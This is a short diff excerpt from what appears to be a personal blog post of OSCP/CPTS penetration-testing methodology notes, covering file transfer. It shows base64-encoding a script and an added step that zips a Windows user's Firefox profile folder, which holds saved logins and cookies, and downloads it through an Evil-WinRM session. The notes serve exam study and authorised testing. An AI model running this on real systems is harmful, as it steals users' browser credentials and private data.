ElmehdiLaassiri/ElmehdiLaassiri.github.io/_posts/2026-04-28-oscp-cpts-methodology.md

 cat test.py | base64 > d

 Now we can execute the encoded file inside the other machine, if we have only  Python .

+# Via Evil-winrm :

+==> To compress a folder for easy transfer :

+Compress-Archive -Path "C:\Users\ops.controller\AppData\Roaming\Mozilla\Firefox\Profiles\v8mn7ijj.default-esr" -DestinationPath "C:\Windows\Temp\ff.zip"
+download ff.zip

 ```

 ## Windows Priv Esc :